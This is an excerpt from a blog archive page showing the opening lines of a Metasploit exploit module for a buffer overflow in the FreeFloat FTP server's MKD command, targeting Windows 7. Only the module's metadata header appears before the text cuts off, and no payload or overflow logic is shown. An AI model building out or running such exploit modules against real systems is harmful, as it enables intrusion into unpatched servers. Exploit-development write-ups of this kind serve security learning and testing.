Category Archives: applications

Exploit example

root@linux:~# more /root/.msf4/modules/exploits/windows/ftp/FreeFloatMKDoverflow.rb require ‘msf/core’ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, ‘Name’ => ‘FloatFTP MKD overflow’, ‘Description’ => ‘MSF exploit module’, ‘Author’ => [ ‘Name Surname’], ‘Version’ => ‘$Revision: 1 $’, ‘Platform’ => [‘win’], ‘Targets’ => [ [ ‘Windows 7 Professional x64 SP1’, { } ],], ‘DefaultTarget’ => 0, ‘License’ […]

Also posted in security | Comments closed